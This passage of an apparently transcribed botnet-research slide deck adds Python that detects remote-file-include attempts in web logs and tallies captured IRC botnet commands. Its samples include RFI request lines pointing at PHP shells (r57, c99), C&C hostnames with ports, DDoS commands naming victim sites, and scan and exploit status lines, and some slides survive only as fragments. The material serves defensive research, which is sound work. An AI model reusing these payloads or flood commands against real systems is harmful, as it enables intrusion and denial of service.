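        return []
    findings = []
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        hint = rfi_hint(value)
        findings.append({
            "source_ip": m.group("ip"),
            "param": name,
            "include_url": value,
            "drop_host": urlsplit(value).hostname,
            "user_agent": m.group("ua"),
            "severity": "high" if hint else "medium",
            "hint": hint,
        })
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    return [f for line in lines for f in inspect_line(line)]


def drop_sites(findings: List[Dict[str, object]]) -> Set[str]:
    """Hosts serving the injected code: the RFI drop sites a web honeypot such as HIHAT collects."""
    return {str(f["drop_host"]) for f in findings if f["severity"] == "high"}


# Constructed access-log lines (documentation IP ranges); r57/c99 are classic PHP shell names.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Aug/2009:18:17:38 +0800] "GET /index.php?page=http://198.51.100.7/r57.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [05/Aug/2009:18:18:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Aug/2009:18:18:12 +0800] "GET /modules/x.php?inc=ftp%3A%2F%2F198.51.100.7%2Fbot.php%3F HTTP/1.1" 500 0 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [05/Aug/2009:18:18:30 +0800] "GET /index.php?page=http://198.51.100.7/c99.txt%00 HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"',
    '192.0.2.77 - - [05/Aug/2009:18:19:02 +0800] "GET /redirect.php?url=http://www.example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['severity']:6s} {h['source_ip']:14s} {h['param']}={h['include_url']!r}  {h['hint'] or ''}")
    print("drop sites:", sorted(drop_sites(hits)))
```

A remote URL in a parameter is not proof on its own (redirectors and feed readers pass URLs legitimately, hence the "medium" grade for the last line); the neutraliser tricks and a libwww-perl user agent, the default of most RFI scanners of that era, are what push a hit to "high". The query is decoded before matching, so the ftp%3A%2F%2F form is caught as well as the plain one.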

  • Page 137

    Summary: honeynet (Nepenthes): honeypot; malicious web pages (Capture-HPC); compromised web (RFI detection): scripts, HTTP botnet (RFI bot); others: URL links, phishing

  • Page 138

    2. Sample Analysis

    Malware DB -> anti-virus; behavior analysis (sandbox, real testbed); static analysis -> sample profiling

    Profile: activities on the OS (registry, process, file); connections on the network (propagation, remote controller); signature generation

  • Page 139

    2. Sample Analysis: binary samples using CWSandbox and Anubis

    1. Network activity to get C&C information 2. Set up a virtual lab and execute samples to get C&C information

  • Page 140

    VirusTotal: http://www.virustotal.com/

  • Page 141

    Tool Analysis

    Binary analysis (static): IDA Pro, OllyDbg. IDA Pro: http://www.hex-rays.com/idapro/ OllyDbg: http://www.ollydbg.de/

    SysAnalyzer: automated malcode runtime analysis application, http://labs.idefense.com/software/malcode.php

    Malcode Analysis Pack: http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack

  • Page 143

    Summary of collected artifacts

    Honeynet (Nepenthes): attack log; IRC C&C server

    Malicious web (Capture-HPC): log; malware file server; IRC C&C and HTTP C&C server

    RFI detection: scripts; RFI bot; C&C server

    Others

  • Page 144

    2. Sample Analysis: RFI scripts analysis using a PHP analyzer

    PHP analysis using function hooking to get C&C information

  • Page 145

    C&C information Analysis in RFI Scripts

  • Page 146

    3. Infiltration & Feedback (figure)

    Binary samples: send the bot to join the C&C server; collect commands, traffic and activities inside the C&C. Samples are executed in a WinXP virtual machine with Wireshark (execute samples); Rishi; xchat for C&C samples; PHP executes the RFI samples (execute RFI scripts); Snort-Inline in front of the C&C servers; activities are collected and analyzed (no execution); switch; IRC server pool; feedback / data feed

  • Page 147

    3. Infiltration (Cont.)

    Live C&C servers: join the C&C server as a bot and observe it (C&C observation)

  • Page 148

    4. Feedback: C&C server

  • Page 149

    5. Analysis:

    1. Malware sample statistics 2. Attack statistics 3. Infected hosts (by honeynet) 4. C&C server information (time, IP, port, account, ASN) (by sample analysis) 5. Real bot connections (inside the botnets) 6. Botnet activities (inside the botnets) 7. Attacked targets (inside the botnets) 8. Command controllers (inside the botnets)

  • Page 151

    1. Samples (by honeypot): unique samples: 23170; 2009/01 ~ 2009/12: 16813. Collected every day: malware binaries (50+), malicious PDFs, malicious documents and RFI scripts (PHP bot, Perl bot) (5+)

  • Page 152

    2. Attack statistics (figure)

  • Page 153

    3. Infected Hosts 467736 (2010/05/05 update)

    Country         Hosts   Share
    Taiwan          1264    27%
    China            965    21%
    United States    468    10%
    Russia           373     8%
    Japan            349     7%
    Germany          236     5%
    Malaysia         227     5%
    Canada           132     3%
    Korea            119     3%
    Romania          110     2%
    France            98     2%
    Others           336     7%

  • Page 154

    Botnet C&C servers observed

    Host                               Protocol (port)          Location
    rep3le.locean-indien.com           IRC (6667/TCP)           France
    symantec.loves.the.cock.pheer.biz  IRC (18067/TCP)          US
    getsome.minilauncher.net           IRC (62567/TCP)          CN
    n0n0.d0d0n0.info                   IRC (8585/TCP)           US
    213.202.205.171                    IRC (6667/TCP)           DE
    online.ircstyle.net                IRC (6667/TCP)           Netherlands
    manz.urshell.com                   IRC (7000/TCP)           US
    123.dragonbreath.ru                IRC (3195/TCP)           US, RU, KR (Fast-Flux)
    camelot.blacknight.ie              WWW (80), mail (25)      Ireland
    avgw.enternet.hu                   SMTP (25)                US
    Web2.denirulz.com                  WWW (81/TCP)             Netherlands
    capdr.com                          WWW (80/TCP)             DE (http://capdr.com/feed/)
    xx.nadnadzz.info                   IRC (10324/TCP)          US (X)
    Priv.gigaservice.it                IRC (55003/TCP)          UE, DE, CN (Fast-Flux)
    nhg1.cjb.net                       IRC (4244/TCP)           RU
    shops.vaiosys.com                  IRC (1234/TCP)           US, CN
    xx.ka3ek.com                       IRC (8080/TCP)           CN, MY, US (Fast-Flux)
    botz.noretards.com                 IRC (65146/TCP)          FR
    Ganbang.my3jn.org                  IRC (43000/TCP)          US
    Scan.kizlarevi.net                 IRC (4646/TCP)           DE
    Wmim.solutionofmsn.org             IRC (1234/TCP)           US
    Fix.drshells.com                   IRC (5555/TCP)           Portugal
    60.10.179.100                      IRC (8680/TCP)           CN

    More than 100 bots in the C&C server

  • Page 155

    4. Live C&C Server Statistics

    45 live C&C servers (tested on June 30th); C&C servers with 300 bots

    US 8 (18%), CN 7 (16%), JP 6 (13%), RU 4 (9%), DE 4 (9%), MY 4 (9%), CA 3 (7%), FR 2 (4%), NL 2 (4%), Others 5 (11%)

  • Page 156

    4. Live C&C servers (2010/06/30 update) (table)

  • Page 157

    5. Real Bot Connections to C&C Servers

    2010/01/01 ~ 2010/06/30: 40~78 C&C servers (HTTP, IRC); bots 60 (chart values: 14024, 11095, 26037, 24165)

  • Page 158

    5. Real Bots Inside the Botnet

    US: 15.69%

    6. Botnet Activities Inside the Botnet:

    DDOS_CMD: 57223 flood http blog.stsc.co.kr/1/1024518222.gif flood http 81.222.236.97/s88.exe flood udp CardServ2.com ddos_start tcp www.ddbp.ru 80 Dd1 http://www.azncommunity.net/ http_start http://nalog-pravo.net/index.php?article=3 flood udp sat-navi.net flood udp vipshara.dyndns.tv

  • Page 160

    6. Botnet Activities Inside the Botnet: (Cont.)

    SCAN_CMD:5926 Scan Right Reserved Type: @karl For My List Of: 90,523 Files Slots: 0/2 Queued: 3

    Speed: 52,525cps Next: 0m Served: 1,428,774 List: Jun 4th Search

    SCAN_STATUS: 532 scan_source='323605A3.645CFD8A.4BB43273.IP', scan_target='76.x.x.x scan_source='Konvics-D0C34FD9.fbx.proxad.net', scan_target='76.x.x.x scan_source='Konvics-30B31C44.artem-catv.ru', scan_target='76.x.x.x',

  • Page 161

    6. Botnet Activities Inside the Botnet: (Cont.)

    EXPLOIT_STATUS:2125 exploit_source='5AA7BDF5.F38BEC2.7DB8B3C.IP', exploit_target='76.246.253.206
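Added example (not the speaker's monitoring scripts): a Python parser that turns lines captured inside an IRC C&C channel, as quoted on pages 159-161, into the figures that step 5 (Analysis) and the incident report need: DDoS targets by host, scanned prefixes, exploited targets. The command grammar (flood / ddos_start / http_start / Dd1, then an optional method, a target, and an optional port) is inferred from the quoted lines and is an assumption; real bot families differ, and unknown lines are dropped rather than guessed at.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import urlsplit

DDOS_VERBS = {"flood", "ddos_start", "http_start", "dd1"}   # verbs seen on page 159 (assumption)
FLOOD_METHODS = {"http", "udp", "tcp", "syn", "icmp"}
KV_RE = re.compile(r"(\w+)='([^',\s]*)'?")                  # key='value' pairs of status reports


def host_of(token: str) -> str:
    """Hostname from a URL, a host/path or a host:port token."""
    if "://" in token:
        return (urlsplit(token).hostname or "").lower()
    return token.split("/", 1)[0].split(":", 1)[0].lower()


def parse_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Classify one captured line as DDOS, SCAN or EXPLOIT; anything else returns None."""
    line = line.strip()
    if not line:
        return None
    kv = dict(KV_RE.findall(line))
    if "scan_source" in kv:
        return {"type": "SCAN", "source": kv.get("scan_source"), "target": kv.get("scan_target")}
    if "exploit_source" in kv:
        return {"type": "EXPLOIT", "source": kv.get("exploit_source"),
                "target": kv.get("exploit_target")}
    tokens = line.split()
    if tokens[0].lower() in DDOS_VERBS and len(tokens) >= 2:
        method: Optional[str] = None
        port: Optional[str] = None
        rest = tokens[1:]
        if rest[0].lower() in FLOOD_METHODS:          # "flood udp host", "ddos_start tcp host 80"
            method, rest = rest[0].lower(), rest[1:]
        if not rest:
            return None
        if method is None and "://" in rest[0]:       # "Dd1 http://host/": method from the scheme
            method = urlsplit(rest[0]).scheme
        if len(rest) >= 2 and rest[1].isdigit():
            port = rest[1]
        return {"type": "DDOS", "method": method, "target": host_of(rest[0]), "port": port}
    return None


def report(lines: List[str]) -> Dict[str, object]:
    """Aggregate captured lines into the figures an incident report needs."""
    by_type: Counter = Counter()
    ddos_targets: Counter = Counter()
    exploit_targets = set()
    scan_prefixes: Counter = Counter()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        by_type[ev["type"]] += 1
        if ev["type"] == "DDOS":
            ddos_targets[ev["target"]] += 1
        elif ev["type"] == "EXPLOIT":
            exploit_targets.add(ev["target"])
        elif ev["type"] == "SCAN" and ev["target"]:
            scan_prefixes[ev["target"].split(".")[0]] += 1   # first octet of the swept range
    return {"counts": dict(by_type), "ddos_targets": ddos_targets,
            "exploit_targets": sorted(exploit_targets), "scan_prefixes": dict(scan_prefixes)}


# The commands and status reports quoted on pages 159-161, plus one line of channel chatter.
CAPTURED = [
    "flood http blog.stsc.co.kr/1/1024518222.gif",
    "flood http 81.222.236.97/s88.exe",
    "flood udp CardServ2.com",
    "ddos_start tcp www.ddbp.ru 80",
    "Dd1 http://www.azncommunity.net/",
    "http_start http://nalog-pravo.net/index.php?article=3",
    "flood udp sat-navi.net",
    "flood udp vipshara.dyndns.tv",
    "scan_source='323605A3.645CFD8A.4BB43273.IP', scan_target='76.x.x.x'",
    "scan_source='Konvics-D0C34FD9.fbx.proxad.net', scan_target='76.x.x.x'",
    "exploit_source='5AA7BDF5.F38BEC2.7DB8B3C.IP', exploit_target='76.246.253.206'",
    ":karl!~k@host PRIVMSG #chan :hi",   # ordinary chatter, ignored
]

if __name__ == "__main__":
    r = report(CAPTURED)
    print(r["counts"])
    print("DDoS targets:", dict(r["ddos_targets"]))
    print("exploit targets:", r["exploit_targets"], "scanned prefixes:", r["scan_prefixes"])
```

The target hostnames are what goes into the feedback to the attacked parties (step 4); the scan and exploit reports carry the bot's own cloaked IRC host mask as the source, so the bot IP has to come from the pcap rather than from the channel text.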

  • Page 162

    7. Botnet Controllers Inside the Botnets

  • Page 163

    8. Infected Hosts and Real Bots in Taiwan

    1264 infected hosts in Taiwan attacked the honeypots: HiNet 867, TANet 261, others 136

    221 bots in Taiwan joined C&C servers: HiNet 142, TANet 47, others 32

  • Page 164

    Antivirus: 35 (2010/03/01 ~ 2010/03/30)

  • Page 165

    Observation 1: W32.Virut 65, Worm.Allaple 21, Trojan.IRCBot 39, Trojan.Spybot 18, Trojan.Zbot 11, Trojan.MyBot 24

  • Page 166

    Observation 2: 700 DDoSeR bots for selling, 153$ paypal ONLY

  • Page 167

    Observation 3: Conficker samples

    Conficker (W32/Conficker!Generic) samples from the malware honeypot: 2010/04: 68, 2010/05: 143, 2010/06: 82

    17:00 ~ 19:00: Conficker

  • Page 169

    http://datalossdb.org/statistics The Open Security Foundation's DataLossDB gathers information about events involving the loss, theft, or exposure of personally identifiable information (PII).

  • Page 171

    CCN: Credit Card Numbers; SSN: Social Security Numbers; NAA: Name and Address; MISC: Miscellaneous; ACC: Account information (financial); DOB: Date of Birth

  • Page 172

    CSI: 70%; ICM: 39%, 52%, 86%

  • Page 173

    2010-04-27: IT

  • Page 174

    http://www.microsoft.com/taiwan/security/privacy/

  • Pages 176-183

    Recommendations (items labelled 25, 3, 17, 10, 1115, 11234, 20, URL; text not recoverable)

  • Page 184

    Encryption and password management (TrueCrypt + KeePass)

  • Page 185

    [email protected]